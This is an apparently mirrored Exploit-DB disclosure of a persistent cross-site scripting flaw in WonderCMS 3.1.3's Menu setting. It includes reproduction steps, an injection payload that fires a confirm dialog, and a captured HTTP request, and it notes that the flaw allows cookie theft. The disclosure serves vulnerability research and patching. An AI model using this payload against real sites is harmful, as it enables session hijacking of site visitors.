WonderCMS 3.1.3 – ‘Menu’ Persistent Cross-Site Scripting

• Exploit Database
• 16 阅读

• 作者： Hemant Patidar
  日期： 2020-12-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49164/

• # Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting
  # Date: 20-11-2020
  # Exploit Author: Hemant Patidar (HemantSolo)
  # Vendor Homepage: https://www.wondercms.com/
  # Version: 3.1.3
  # Tested on: Windows 10/Kali Linux
  # Contact: https://www.linkedin.com/in/hemantsolo/
  # CVE: CVE-2020-29469
  
  Attack vector:
  This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
  
  Vulnerable Parameters: Menu.
  
  Steps-To-Reproduce:
  1. Go to the Simple website builder.
  2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>"
  3. Now go to the website and the XSS will be triggered.
  
  GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1
  Host: 127.0.0.1
  Connection: close
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  DNT: 1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1
  Accept-Encoding: gzip, deflate
  Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
  Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93